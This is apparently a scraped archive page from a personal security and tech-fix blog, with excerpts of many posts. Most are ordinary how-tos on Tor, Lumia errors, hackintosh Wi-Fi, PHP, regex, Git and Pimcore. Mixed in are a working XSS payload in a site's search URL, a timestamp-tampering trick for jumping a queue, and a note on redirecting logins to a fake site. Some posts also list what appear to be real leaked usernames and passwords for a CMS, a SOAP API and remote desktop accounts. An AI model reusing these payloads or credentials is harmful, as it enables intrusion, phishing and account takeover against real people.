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Showing posts from 2020 | xss

XSS[query]=recaptcha&jed_live[refinementList][versions][0]=fantastic <img src=x:alert(alt) onerror=eval(src) alt="Merry xssmas!"> Archived page:  Note: Bug reported to on 30/11/2020 - jump the queue (salta la fila)

   Open tamper data (firefox) or any other application (like a proxy to tamper data) and check the post requests. When you get something like that[unixtimestamp]&cid=it-IT Set the unixtimestamp to a future date ex. if you the current value is 1604445083694 replace with 1774445083694 (2026+). I used just 1774495521 and it works. ex. | misconfigured server, data leak (same cms of | Vulnerable CMS     user             = "ist"     pwd             = "minerva" username = "minervaeurope" ' Change this to your preferred username. password = "minervanewsletter" ' Change this to your preferred password. archived: The "museo web cms" (asp?) and "Glizy Framework" have several vulnerabilities. ------------------------------- source code?

xss and login hijacking -

    Example: If the user tries to login we can redirect him to a different (fake) website that saves the login informations.";strUrl="";a="         List of all benitutelati from to

[FIX] Tor Browser Portable - how to allow multiple instances (with other firefox browsers that are already open)

  Edit  \TorBrowser-*.*.*\App\TorBrowser\application.ini and Add under [App]  AllowMultipleInstances=true     (that's all)  Example [App] Vendor=Mozilla Name=Firefox RemotingName=firefox CodeName=Tor Browser Version=45.9.0 BuildID=20170201100101 ID={ec8030f7-c20a-464f-9b0e-13a3a9e97384} AllowMultipleInstances=true

error code 80072F30 nokia lumia 630 620 610 600 710 720 730 700 830 820 810 800 930 920 910

 error code 80072F30 nokia lumia 630 620 610 600 710 720 730 700 830 820 810 800 930 920 910 possible problems and solutions Wrong DATE/TIME Edit menu > settings > date+time. Inconsistency between the Internet APN on your SIM and the access point in the customer's data plan  Update the access point  phone menu > settings > access point > add

Mac OSx Wifi airport fix - hackintosh (Mountain Lion, Mavericks)

Fixing Wi-Fi Issues on Mac OS X Hackintosh (Old) If you are experiencing issues with Wi-Fi on your Mac OS X hackintosh, you may find that the Wi-Fi airport is not working or is not showing any available networks. Here's a quick fix to help you get back online: Method 1: Reconfigure Wi-Fi Settings Go to System Preferences and select "Network". Select the Wi-Fi network and click on "Open Network Preferences". Select the Wi-Fi device. Click on the cog icon (located near the plus and minus icons) at the bottom of the box. Select "Make Service Inactive". Click on the minus (-) icon to delete the Wi-Fi network. Re-add the Wi-Fi device using the plus (+) icon. Click on "Apply" to save the changes. Other method: Install the latest drivers for your Wi-Fi device Reboot your computer. Related Searches: Mac OS X Mountain Lion Wi-Fi Fix Mac OS X Mavericks Wi-Fi Fix Wi-Fi Issues on Mac OS X Hackintosh ...

Use -option+S- at boot to enter in the single root mode.

Use -option+S- at boot to enter in the single root mode. run those commands To set in read and write the / # mount -o update / /sbin/mount -uw / # cd /Library/Preferences # rm # rm # cd /Library/Caches # rm -r * # cd /System/Library # rm Extensions.mkext # cd /System/Library/Caches # rm -r * # reboot

FIX Fatal error: Call to undefined function filter_var() - filter_var alternative

Fatal error : Call to undefined function filter_var() This function is available only for PHP 5 >= 5.2.0 <?php /*fix for older php version*/ if (!function_exists('filter_var')){ define(FILTER_VALIDATE_EMAIL,'/^[A-Za-z0-9-_.+%]+@[A-Za-z0-9-.]+.[A-Za-z]{2,4}$/'); function filter_var($string, $filter_type) { if ( preg_match( FILTER_VALIDATE_EMAIL, $string ) ) { return true; } return false; } } $val = ''; if (filter_var($val, FILTER_VALIDATE_EMAIL) === false) { die("$val wrong email");} echo 'ok';

regular expression to remove all non alphanumeric characters except punctuation carriage return

regular expression to remove all non alphanumeric characters except punctuation carriage return They can be used with php preg_replace, sed, notepad++, sublimite text, phpstorm, editpad, powershell, emeditor, dreamweaver, bbedit, brief, elvis, grep, java, Openoffice, libreoffice, word, netbeans, note tab, nvi, omnioutliner, pspad, python, qt, regel, regexbuddy, sas, SubEthaEdit, tcc command line, tera term, textmate, TSE, UltraEdit, Vile, Vim, scite and anything else that supports regex (I hope). regular expression that matches all non alphanumeric (from A to Z upper and lowercase. From zero to nine) characters except punctuation and other characters like line feed and carriage return. ,;()[]{}. It does match characters that are not in the english alphabet. [^a-zA-Z0-9\s,;\-_\[\]\{\}()\.\/\\\+&#\"\']  Matching all non alphanumeric. [\W\D\S] I'm not an expert of regular expressions so, please, comment if you find errors.

How to Configure Notepad++ and Notepad as Default Editors in Git for Windows: A simple Guide

How to Configure and Use Notepad++ and Notepad in Git for Windows If you're using Git for Windows and prefer to use Notepad++ or Notepad as your default editor instead of the default Git editor, this guide will help you configure it. Configuring Notepad++ in Git for Windows To configure Notepad++ in Git for Windows, you'll need to know the path to your Notepad++ installation (e.g., C:/Program Files/Notepad++ ). Once you have the path, you can run the following command: git config core.editor "'C:/Program Files (x86)/Notepad++/notepad++.exe' -multiInst -notabbar -nosession -noPlugin " This command will set Notepad++ as your default editor in Git for Windows. Configuring Notepad in Git for Windows To configure Notepad in Git for Windows, you can run the following command: git config core.editor "'C:/windows/system32/notepad.exe' -multiInst -notabbar -nosession -noPlugin " This command will set Notepad as your default editor in...

Install Windows 10 via USB on older macbook and imac without bootcamp

This simple guide is the solution for those that don't have a working superdrive (uj-8a8 in my case) and are getting the error "no bootable device" when bootcamp tries to reboot in (a sort of) legacy mode. Before doing anything BACKUP your data. Do NOT attempt any kind of operation if you are risking to lose important data or you are afraid to corrupt your actual osx installation. Make sure that you have an USB with your osx Installer or a network connection from which recover the OSX system Make sure that you have at least an 8gb USB Drive (I suggest a 16gb thumb). Download Windows 10 from the microsoft website. You need a Windows Operating system to download Windows 10 from the Microsoft Website (english) (in italiano) Create your Windows 10 Installation USB Pendrive (or disk) with the tool that you prefer. For mac osx or other Operti...

[Solution] How to Troubleshoot Pimcore Installation on Windows Server: Resolving the 2GB Limit Issue (x32)

Troubleshooting Pimcore Installation on Windows Server: How to Resolve 2GB Limit Issue Are you facing issues while installing Pimcore on your Windows server? One of the most common issues that users encounter is the 2GB limit error. To prevent this error from occurring, it's essential to use PHP7 x64. The x32 version may cause limitations that lead to this error. To ensure a smooth Pimcore installation process, you'll also need to ensure that the following settings are in place: Database Charset utf8mb4 is required. innodb_large_prefix = ON is required. innodb_file_format = Barracuda is required. To set these values in your my.ini file, follow these steps: [mysqld] innodb_file_format = Barracuda innodb_large_prefix = 1 innodb_file_per_table = ON By following these steps, you should be able to resolve the 2GB limit issue and complete the Pimcore installation on your Windows server. blackbaud soap api

SOAP API documentation we can request the wsdl archived: sample with an online client APIs developed by user: mah pass: £138JAMADee Mark Hipperson - remote desktop --- user: jlp pass: Macbeth2020 jane Peters ---- james.traynor Thunderbird4

Moodle 3.8.1+ - path leak via errors in several files

Moodle 3.8.1+ ----------------------------------------------- File: admin/mailout-debugger.php #!/usr/bin/php Notice : Disabled. in \admin\mailout-debugger.php on line 73 File: admin/settings/appearance.php Notice : Undefined variable: hassiteconfig in \admin\settings\appearance.php on line 10 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\appearance.php:10 Stack trace: #0 {main} thrown in \admin\settings\appearance.php on line 10 File: admin/settings/badges.php Notice : Undefined variable: hassiteconfig in \admin\settings\badges.php on line 30 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\badges.php:30 Stack trace: #0 {main} thrown in \admin\settings\badges.php on line 30 File: admin/settings/courses.php Notice : Undefined variable: hassiteconfig in \admin\settings\courses.php on line 32 Fatal error : Uncaught Error: Call to undefined function ...